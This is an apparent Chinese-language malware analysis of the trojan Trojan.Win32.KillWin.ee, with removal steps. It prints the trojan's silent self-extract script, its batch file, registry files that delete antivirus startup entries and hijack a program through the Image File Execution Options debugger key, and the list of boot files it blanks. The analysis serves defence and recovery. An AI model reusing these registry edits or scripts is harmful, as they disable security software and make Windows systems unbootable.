分析清除Trojan.Win32.KillWin.ee木马

　　病毒日新月异的今天，越来越多的伪装及新型变种是一天接一天的疯狂，面对如此情况，很多网民是只能一次又一次的进行系统还原或者是重装系统。而安全软件在此时却显得力不从心，因为很多病毒木马在发作前都开始解除安软的保护功能，这不新出现的Trojan.Win32.KillWin.ee也具备此种功能。

　　病毒分析

　　该病毒名为Trojan.Win32.KillWin.ee，文件虽然只有小小的169 KB(173,614 字节)，但其威力却不容小视。病毒为WINRAR自解压缩包格式，可通过修改自身图标为卡卡助手的标识来进行伪装自身。当病毒进驻到用户计算机后，会释放BAT和REG命令的执行文件，并利用命令方式删除用户计算机中的卡卡助手启动项，禁止其真实的程序启动，然后通过劫持卡卡的主程序并将其指向病毒主体gameover.exe程序。

　　该程序在使用自动解压缩命令解压自身后开始进行系统破坏，其自解压命令如下：

　　Path=%SystemRoot%\system32\

　　SavePath

　　Setup=hidecmd.exe kv.bat

　　Silent=1

　　Overwrite=1

　　执行hidecmd.exe(隐藏执行BAT)用参数调用kv.bat隐藏执行。

　　kv.bat的内容为：

　　@echo off

　　%SystemRoot%\regedit /s kaka.reg

　　%SystemRoot%\regedit /s gameover.reg

　　Exit

　　病毒修改注册表

　　在结束上述命令后，病毒源体开始接着导入到系统中两个REG文件，来修改注册表，其内容如下：

　　kaka.reg：

　　Windows Registry Editor Version 5.00

　　[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]

　　"KKDelay"="C:\\Program Files\\Rising\\AntiSpyware\\RunOnce.exe"

　　[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]

　　"runeip"="\"C:\\Program Files\\Rising\\AntiSpyware\\runiep.exe\" /startup"

　　[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OptionalComponents]

　　[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OptionalComponents\IMAIL]

　　"Installed"="1"

　　[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OptionalComponents\MAPI]

　　"Installed"="1"

　　"NoChange"="1"

　　[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OptionalComponents\MSFS]

　　"Installed"="1"

　　病毒删除卡卡助手

　　到此时病毒依然没有停手，其开始查找并删除卡卡助手的相关启动，其内容如下：

　　gameover.reg：

　　Windows Registry Editor Version 5.00

　　[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Ras.exe]

　　"Debugger"="C:\\winnt\\system32\\gameover.exe"

　　从而进行劫持卡卡主程序并将其指向释放的病毒。

　　小提示：从这里%SystemRoot%\system32\可以看出作者针对的是WIN2K系列，因为刚才的WINRAR释放脚本使用的是环境变量，只有在WIN2K系列操作平台中才是WINNT文件夹，而在XP里是WINDOWS\system32\，所以这个劫持指向无效。

　　重要注释

　　%System32%是一个可变路径，病毒通过查询操作系统来决定当前System文件夹的位置。Windows2000/NT中默认的安装路径是C:\Winnt\System32，windows95/98/me中默认的安装路径是C:\Windows\System，windowsXP中默认的安装路径是C:\Windows\System32。

　　%Temp% = C:\Documents and Settings\AAAAA\Local Settings\Temp 当前用户TEMP缓存变量

　　%Windir%\ WINDODWS所在目录

　　%DriveLetter%\ 逻辑驱动器根目录

　　%ProgramFiles%\ 系统程序默认安装目录

　　%HomeDrive% = C:\ 当前启动的系统的所在分区

　　%Documents and Settings%\ 当前用户文档根目录

　　破坏系统的gameover.exe

　　病毒在对卡卡劫持后，开始进行下一步活动，在系统中放入gameover.exe程序进行系统破坏。其实gameover.exe也是一个自解压缩包，内含自解压脚本命令如下：

　　Path=C:\

　　SavePath

　　Silent=1

　　Overwrite=1

　　释放了0字节的同名空文件替换以下系统文件，破坏系统启动：

　　AUTOEXEC.BAT

　　boot.ini

　　bootfont.bin

　　CONFIG.SYS

　　IO.SYS

　　MSDOS.SYS

　　NTDETECT.COM

　　Ntldr

　　清除病毒

　　普通用户可通过系统镜像还原实现系统恢复，而对于有一定基础的网民来说，可以系统光盘中复制上述的系统文件进行修复操作系统平台。在查找文件时可以用DIR命令来查找其相关位置，如：首先进入光盘的盘符，然后输入：DIR Autoexe.bat，系统会将此路径下的Autoexe.bat文件的位置显示出来，然后再进行复制文件，其命令格式如下：

　　COPY_源路径_目标路径(其中_为空格)，比如：“COPY_X:\autoexe.bat_C:\”就表示将X盘根目录下的Autoexe.bat文件拷贝到C盘根目录下。

　　然后删除系统目录%SystemRoot%\system32\下的gameover.exe文件即可，最后进行杀毒软件的升级与全盘杀毒，以防另类感染。

　　编者按：病毒虽然有其入驻破坏之道，但只要掌握其原理，在了解其运行过程与所添加的注册表项目后，即可轻而易举的将其清除出系统之外，还平台一个安全的环境。